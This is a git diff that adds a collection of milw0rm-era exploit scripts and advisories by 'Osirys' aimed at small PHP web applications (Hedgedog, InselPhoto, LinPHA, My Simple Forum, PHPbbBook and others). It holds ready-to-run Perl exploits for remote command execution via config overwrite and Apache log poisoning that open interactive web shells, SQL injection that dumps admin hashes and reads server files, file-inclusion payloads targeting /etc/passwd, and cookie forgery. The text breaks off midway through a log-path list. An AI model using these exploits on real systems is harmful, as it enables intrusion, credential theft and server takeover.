overwrite { + if ($old_data_gotcha != 1) { + $title = "Website"; + $username = "Username"; + $contact = "admin\@admin.com"; + $copyright = "2007 website"; + } + + my $url = $path.$post_pag; + + my $code= "e_maintitle=". $title."&e_autor=".$username."&e_contact=". $contact. $rce_c0de. + "&e_copyright=".$copyright."&e_theme=.%2Ftemp%2Fstrawberry%2F&e_language=engli". + "sh.lng&e_favicon=&e_sp=true&e_version=true&e_guestbook=true&l_mode=35"; + + my $length = length($code); + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[*] Overwriting configuration data ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /The configurations have been saved successfully/) { + print "[*] Overwrite succesfully !\n"; + $own = 1; + } + } + + $own == 1 || die "[-] Can't overwrite configuration data !\n"; + + print "[&] Hi my master, do your job now [!]\n\n"; + &exec_cmd; +} + +sub exec_cmd { + my(@outs,$out); + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host.$rce_path."?cmd=".$cmd; + $re = get_req($exec_url); + if ($re =~ /./) { + print $re; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub get_old_data() { + my $re = $_[0]; + if ($re =~ /name="e_maintitle" value="(.*)" size/) { $title = $1; } + if ($re =~ /name="e_autor" value="(.*)" size/) { $username = $1; } + if ($re =~ /name="e_contact" value="(.*)" size/) { $contact = $1; } + if ($re =~ /name="e_copyright" value="(.*)" size/) { $copyright = $1; } + $old_data_gotcha = 1; +} + +sub banner { + print "\n". + " -------------------------------- \n". + " Hedgedog-CMS RCE Exploit \n". + " by Osirys \n". + " -------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/InselPhoto 1.1 - SQL Injection.pl b/InselPhoto 1.1 - SQL Injection.pl new file mode 100644 index 0000000..0af47a9 --- /dev/null +++ b/InselPhoto 1.1 - SQL Injection.pl @@ -0,0 +1,249 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : InselPhoto v1.1 | +# |Download : http://www.inselphoto.com/download.php?p=get_inselphoto | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Exploit (Admin credentials extract + File Disclosure via Sql Injection) | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | Vulnerable file is: /[path]/search.php line 37 +# |SQL Injections used by this sploit : +# |[1] ' union select 0,0,concat(username,0x3a,password),0,0,0,0,0 from inselphoto_users# +# |[2] ' union select 0,0,load_file('lf'),0,0,0,0,0# +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This CMS is vulnerable to sql injection.This simple exploit just uses the sql bug to get admin credentials (username,password) and +# |uses load_file() mysql function to disclosure local file on the server. +# |This time no RCE exploit avaiable, becouse POST query is filtered with htmlentities, so will be impossible to write php code into +# |a file, for the fact that < > char will be html encoded. +# |----------------------------------------------------------------------------------------------------------------------------------| + + +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql2.txt http://localhost/InselPhoto/ admin_hash +# +# ----------------------------------- +# InselPhoto SQL Injection Sploit +# Coded by Osirys +# ----------------------------------- +# +# [*] Extracting users credentials .. +# +# [*] Username: admin +# [*] Password: 5f4dcc3b5aa765d61d8327deb882cf99 +# +# [*] Username: osirys +# [*] Password: 6e1459df459890dfd8b4c3687c18abba +# +# [!] Succesfully Exploited ! +# +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql2.txt http://localhost/InselPhoto/ file_disc +# +# ----------------------------------- +# InselPhoto SQL Injection Sploit +# Coded by Osirys +# ----------------------------------- +# +# [*] cat /home/osirys/test.txt +# Local file loaded :D +# +# [*] cat exit +# [-] Quitting .. +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| + +use IO::Socket; + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; + +my $sql_inj_path = "/search.php"; + +($host,$expl) || help("-1"); +cheek($host,$expl) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&adm_hash if $expl_way == 1; +&file_discl if $expl_way == 2; + +sub adm_hash { + my $url = $path.$sql_inj_path; + + my $code= "query=%27+union+select+0%2C0%2Cconcat%28username%2C0x3a%2Cpassword%29%2C0%2C0%2C0%2C0%2C0+from+inselphoto_users%23&type=photo"; + + my $length = length($code); + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[*] Extracting users credentials ..\n\n"; + $socket->send($data); + + while (my $e = <$socket>) { + if ($e =~ /([a-zA-Z0-9-_.]{2,15}):([a-f0-9]{32})/) { + $gotcha = 1; + print "[*] Username: $1\n"; + print "[*] Password: $2\n\n"; + } + } + + if ($gotcha != 1) { + print "[-] Can't extract users credentials\n[-] Exploit Failed !\n\n"; + exit(0); + } + + print "[!] Succesfully Exploited !\n\n"; + exit(0); +} + +sub file_discl { + my @outs; + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + + my $url = $path.$sql_inj_path; + my $lfile = html($file); + my $code= "query=%27+union+select+0%2C0%2Cload_file%28%27".$lfile."%27%29%2C0%2C0%2C0%2C0%2C0%23&type=photo"; + + my $length = length($code); + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + $socket->send($data); + + while ((my $e = <$socket>)&&($stop != 1)) { + if ($e =~ /\/0\/0' rel='lightbox\[insel\]/) { + $stop = 1; + } + push(@outs,$e); + } + my $out = join '', @outs; + my $content = tag($out); + if ($content =~ /\$href='users\/\*\*(.+)\/0\/0'\$rel='lightbox\[insel\]/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + else { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub html() { + my $string = $_[0]; + $string =~ s/\//\%2F/g; + $string =~ s/\\/\%5C/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /admin_hash/) { + $ch_expl = 1; + $expl_way = 1; + } + elsif ($expl =~ /file_disc/) { + $ch_expl = 1; + $expl_way = 2; + } + return 1 if ((($ch_host)&&($ch_expl)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " -----------------------------------\n". + " InselPhoto SQL Injection Sploit \n". + " Coded by Osirys \n". + " -----------------------------------\n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_hash\n"; + print " Ex: perl $0 http://site.it/cms/ admin_hash\n"; + print "[*] Usage : perl $0 http://hostname/cms_path file_disc\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc\n"; + exit(0); +} + +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/LinPHA Photo Gallery 2.0 - Remote Command Execution.pl b/LinPHA Photo Gallery 2.0 - Remote Command Execution.pl new file mode 100644 index 0000000..3257c90 --- /dev/null +++ b/LinPHA Photo Gallery 2.0 - Remote Command Execution.pl @@ -0,0 +1,218 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------------------------------------------------- +# LinPHA Photo Gallery 2.0 Alpha +# http://sourceforge.net/project/downloading.php?group_id=64772&use_mirror=heanet&filename=linpha2-alpha1.tar.gz&94291669 +# Remote Command Execution Exploit +# by Osirys +# osirys[at]live[dot]it +# osirys.org + +# Greets to: x0r, str0ke, emgent, and my big friend Jay +# Tested in local with: magic quotes => Off + +# ------------------------------------------------------------------ +# Exploit in action :D +# ------------------------------------------------------------------ +# osirys[~]>$ perl rce.txt http://localhost/linpha2/ +# +# ------------------------------------------- +# LinPHA 2.0a Code Execution Exploit +# Coded by Osirys +# ------------------------------------------- +# +# [+] New Language added ! +# [+] Editing new Language .. +# [+] New Language Edited ! +# [*] Hi my master, execute your commands ! +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> ls +# lang.freedom.php +# lang.freedom.php.bak +# language.php +# language.php~ +# shell[localhost]$> pwd +# /home/osirys/web/linpha2/lib/lang +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $new_lang_name = "freedom"; +my $add_lang_path = "/lib/lang/language.php?action=create_file"; +my $edt_lang_path = "/lib/lang/language.php?action=edit_lang&language="; +my $rce_path = "/lib/lang/lang".$new_lang_name.".php"; +my $phpc0de = "%22%29%3Bsystem%28%24_GET%5Bcmd%5D%29%3B%24a%3D+array%28%22"; +my $i = 0; +my $c = 0; +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&new_lang_create($new_lang_name); + +sub new_lang_create() { + my $new_lang_name = $_[0]; + my $url = $host.$add_lang_path; + + my $ua = LWP::UserAgent->new; + my $re = $ua->request(POST $url, + Content_Type => 'form-data', + Content => [ + filename => $new_lang_name, + action => 'create_file', + submit => 'submit' + ] + ); + + if (($re->is_success)&&($re->as_string =~ /File already exists!/)) { + $i++; + print "[+] Language already exists, creating a new one ..\n"; + $new_lang_name = "freedom".$i; + $edt_lang_path = "/lib/lang/language.php?action=edit_lang&language=".$new_lang_name; + &new_lang_create($new_lang_name); + } + elsif (($re->is_success)&&($re->as_string =~ /Fine - now please go/)) { + print "[+] New Language added !\n"; + &new_lang_edit($new_lang_name); + } + else { + print "[-] Unable to add a new language\n"; + print "[-] Exploit Failed\n\n"; + exit(0); + } +} + +sub new_lang_edit() { + my $new_lang_name = $_[0]; + my $url = $path.$edt_lang_path; + my $code = "phrase%5BAlbums%0D%0A%5D%5B%5D=".$phpc0de."&phrase%5BExtended+Search%0D%0A%5D%5B%5D=". + "&phrase%5BHi%2C+this+is+the+home+of+%22The+PHP+Photo+Archive%22+%3Ca+href%3D%22http%". + "3A%2F%2Flinpha.sf.net%22%3Eaka+LinPHA%3C%2Fa%3E.%0D%0A%5D%5B%5D=&phrase%5BHome%0D%0A". + "%5D%5B%5D=&phrase%5BLinpha+Syslog%0D%0A%5D%5B%5D=&phrase%5BLogin%0D%0A%5D%5B%5D=&phr". + "ase%5BPassword%0D%0A%5D%5B%5D=&phrase%5BRemember+Me%0D%0A%5D%5B%5D=&phrase%5BSearch%". + "0D%0A%5D%5B%5D=&phrase%5BUsername%0D%0A%5D%5B%5D=&phrase%5BWelcome%0D%0A%5D%5B%5D=&p". + "hrase%5BYou+must+have+cookies+enabled+to+log+in.%0D%0A%5D%5B%5D=&action=save_lang&la". + "nguage=..%2F..%2Flib%2Flang%2Flang.".$new_lang_name.".php&submit=submit"; + my $length = length($code); + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[+] Editing new Language ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($inj_t != 1)) { + if ($e =~ /Welcome To LinPHA2 Translation Module/) { + print "[+] New Language Edited !\n"; + print "[*] Hi my master, execute your commands !\n\n"; + $inj_t = 1; + } + } + $inj_t == 1 || die "[-] Unable to edit new Language ! \n"; + + &exec_cmd($new_lang_name); +} + +sub exec_cmd() { + my $new_lang_name = $_[0]; + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $rce_path = "/lib/lang/lang.".$new_lang_name.".php"; + $exec_url = ($host.$rce_path."?cmd=".$cmd); + $re = get_req($exec_url); + if ($re =~ /(.*)/) { + push(@outs,$re); + foreach my $o(@outs) { + print "$o"; + } + &exec_cmd; + } + elsif ($re !~ /[a-z0-9]/) { + $c++; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " ------------------------------------------- \n". + " LinPHA 2.0a Code Execution Exploit \n". + " Coded by Osirys \n". + " ------------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-01-20] \ No newline at end of file diff --git a/Mediatheka 4.2 Local File Inclusion.txt b/Mediatheka 4.2 Local File Inclusion.txt new file mode 100644 index 0000000..c8327ae --- /dev/null +++ b/Mediatheka 4.2 Local File Inclusion.txt @@ -0,0 +1,38 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : Mediatheka 4.2 +Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1 +Vulnerability : Local File Inclusion +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke + +######################################################################################### +[0x02] Bug:[Local File Inclusion] +###### + +Bugged file is: /[path]/index.php + +[CODE] + + if(isset($_GET['lang'])) + $lang = $_GET['lang']; + else + $lang = 'en'; + include("langs/$lang.php"); + +[/CODE] + + +[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include] + ../../../../../../../../../../../etc/passwd%00 +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-14] + \ No newline at end of file diff --git a/My Simple Forum 7.1 - Remote Command Execution.pl b/My Simple Forum 7.1 - Remote Command Execution.pl new file mode 100644 index 0000000..473cdee --- /dev/null +++ b/My Simple Forum 7.1 - Remote Command Execution.pl @@ -0,0 +1,209 @@ +#!/usr/bin/perl + +# My Simple Forum v7.1 +# Remote Command Execution Exploit (Apache Log Poisoning/Injection) +# Local File Inclusion at /theme/default/index.template.php?action=[lf]%00 +# XSS at /theme/default/index.template.php?Name=[XSS] - This needs Register Globals ON +# Credits to Giovanni Buzzin, "Osirys" +# osirys[at]autistici[dot]org + +# --------------------------------------------------------------------------------------- +# Exploit on Local +# --------------------------------------------------------------------------------------- +# osirys[~]>$ perl spl.txt http://localhost/MySimpleForum_v.7.1/ +# +# --------------------------------- +# My Simple Forum RCE Sploit +# (Log Inj) +# by Osirys +# --------------------------------- +# +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] +# +# shell[localhost]$> pwd +# /home/osirys/web/MySimpleForum_v.7.1 +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> exit +# [-] Quitting .. +# +# osirys[~]>$ +# --------------------------------------------------------------------------------------- + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = "/index.php?action="; +my $null_byte = "%00"; +my $rand_a = int(rand 150); +my $rand1 = "1337".$rand_a."1337"; +my $rand_b = int(rand 150); +my $rand2 = "1337".$rand_b."1337"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n"; +print $sock "Host: ".$host."\r\n"; +print $sock "Connection: close\r\n\r\n"; +close($sock); + +print "[*] Cheeking for Apache Logs ..\n"; + +while (($log = <@logs_dirs>)&&($gotcha != 1)) { + $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte; + $re = get_req($tmp_path); + if ($re =~ /Osirys_log_inj/) { + $gotcha = 1; + $log_path = $tmp_path; + print "[*] Apache Log Injection completed\n"; + print "[*] Path: $log\n"; + print "[!] Hi my master, do your job now [x]\n\n"; + &exec_cmd; + } +} + +$gotcha == 1 || die "[-] Couldn't find Apache Logs\n"; + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n\n"; + $exec_url = $log_path."&cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.+)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.+)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------- \n". + " My Simple Forum RCE Sploit \n". + " (Log Inj) \n". + " by Osirys \n". + " --------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-03-27] \ No newline at end of file diff --git a/Nitrotech 0.0.3a - Remote File Inclusion SQL Injection.txt b/Nitrotech 0.0.3a - Remote File Inclusion SQL Injection.txt new file mode 100644 index 0000000..4d541c2 --- /dev/null +++ b/Nitrotech 0.0.3a - Remote File Inclusion SQL Injection.txt @@ -0,0 +1,57 @@ +Name: Nitrotech 0.0.3a Multiple Remote Vulnerabilities +Download: http://sourceforge.net/project/downloading.php?groupname=nitrotech&filename=nitrotech_003a.zip&use_mirror=garr +Author: Osirys, thanks to x0r +Contact: osirys@live.it + +Nitrotech cms is vulnerable to multiple vulnerabilities, like remote file inclusion and sql injection. + +#### Remote File Inclusion Vulnerability + +The first bug, the remote file inclusion, is caused becouse of an include of a non declarated variable. +Let's see the code. + +File: /[path]/includes/common.php + +[code] + $root. +To fix this bug, we could just define this variable. + +#### Sql Injection Vulnerability + +Note: In the source there could be other sql injection, just found them by yourself if you are intersted ! + +This vulnerability is caused becouse of a direct use in a query of a get variable. To avoid this vulnerability +we could filtered the variable, for example with an int(). + +File: /[path]/members.php + +[code] + if($page_mode == 'view_user') + { + $query1 = "SELECT * FROM " . $table['users'] . " WHERE id = '" . $_GET['id'] . "'"; + $result1 = mysql_query($query1); +# OTHER CODE +[/code] + +## EXPLOIT: + http://localhost/[path]/members.php?id=' union all select 1,concat_ws(0x3a3a,id,username,0x3a3a,password),3,4,5,6,7,8,9,10,11,12 from nitrotech_users/*&mode=view_user& +## + +As we can see, The 'id' variable comes directly from get. So we can inject our hell code. + +#### + +# milw0rm.com [2008-11-24] \ No newline at end of file diff --git a/OwenPoll 1.0 - Insecure Cookie Handling.txt b/OwenPoll 1.0 - Insecure Cookie Handling.txt new file mode 100644 index 0000000..90d0c23 --- /dev/null +++ b/OwenPoll 1.0 - Insecure Cookie Handling.txt @@ -0,0 +1,48 @@ +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : OwenPoll 1.0 +Download : http://www.hotscripts.com/jump.php?listing_id=75178&jump_type=1 +Vulnerability : Insecure Cookie Handling +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +#################################################################################################################### +[0x02] Bug: [Insecure Cookie Handling] +###### + +Bugged file is: /[path]/checkloginmini.php + +[CODE] + + if (($loggedinname == $adminusername) AND ($loggedinpass == $adminpass)){ + // authentication was successful + // create session and set cookie with username + session_start(); + $_SESSION['auth'] = 1; + + setcookie("username", $_POST['txtusername'], time()+(86400*30)); + +[/CODE] + +If we log in correctly, a cookie is set with name "username" and as content the username name. + +[!] FIX: Set as content username's password. + +[CODE] setcookie("username", $_POST['txtpassword'], time()+(86400*30)); [/CODE] + + +[!] EXPLOIT: javascript:document.cookie = "username=admin_username; path=/"; + *admin_username is the nick of the administrator + +#################################################################################################################### + +[/END] + +# milw0rm.com [2008-12-28] \ No newline at end of file diff --git a/PHP Photo Album 0.8b - Local File Inclusion.txt b/PHP Photo Album 0.8b - Local File Inclusion.txt new file mode 100644 index 0000000..add182b --- /dev/null +++ b/PHP Photo Album 0.8b - Local File Inclusion.txt @@ -0,0 +1,52 @@ +[START] + +################################################################################################################################### +[0x01] Informations: + +Script : Php Photo Album 0.8 BETA +Download : http://sourceforge.net/project/downloading.php?group_id=151573&use_mirror=kent&filename=PHPPA_.9_BETA.zip&37834145 +Vulnerability : Local File Inclusion +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian + + +################################################################################################################################### +[0x02] Bug: [Local File Inclusion] +###### + +Bugged file is: /[path]/index.php + +[CODE] + +$skin_temp = $_GET['preview']; +if(isset($_GET['preview']) && file_exists("./skin/$skin_temp/config.php")){ + $skin = $_GET['preview']; + } +else{ + $skin = vari("skin"); + } +require("./skin/$skin/config.php"); + +[/CODE] + +If 'preview' from GET is provided, we can include it just bypassing a stupid cheek. +file_exists("./skin/$skin_temp/config.php) <-- this cheek is stupid, becouse when +we set a value to $skin_temp , if we set a local file with a directory trasversal +it's obvious that the file exists, so it will be included. + +[!] FIX: Use another filter instead of file_exists("./skin/$skin_temp/config.php) + Just filter $skin_temp before include it. A fix could be to declare $skin + with a standard or local value, or just put the allowed values in an array, + and cheek then if the skin provided is allowed. See is_in_array() function + + +[!] EXPLOIT: /[path]/index.php?preview=[local_file]%00 + ../../../../../../../../../../../../etc/passwd%00 + +################################################################################################################################### + +[/END] + +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/PHPbbBook 1.3 - Local File Inclusion.pl b/PHPbbBook 1.3 - Local File Inclusion.pl new file mode 100644 index 0000000..d7fc443 --- /dev/null +++ b/PHPbbBook 1.3 - Local File Inclusion.pl @@ -0,0 +1,206 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------- + +# App => PHPbbBook 1.3 +# Downl => http://phpbbbook.syssap.nl/downloads/PHPbbBook-1.3h.zip + +# Remote Command Execution Exploit (Log Inj) +# Bug: Local File Inclusion /-> /[path]/bbcode.php?l=[lf]%00 +# by Osirys +# osirys[at]autistici[dot]org +# osirys.org + + +# ------------------------------------------------------------------ +# Exploit in action [>!] +# ------------------------------------------------------------------ +# osirys[~]>$ perl lfi_rce.txt http://localhost/PHPbbBook/ bbcode.php?l= + +# --------------------------------- +# PHPbbBook RCE Exploit +# via Log Inj +# by Osirys +# --------------------------------- + +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] + +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pws +# bash: pws: command not found +# shell[localhost]$> pwd +# /home/osirys/web/PHPbbBook +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]> +# ------------------------------------------------------------------ + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = $ARGV[1]; +my $null_byte = "%00"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + 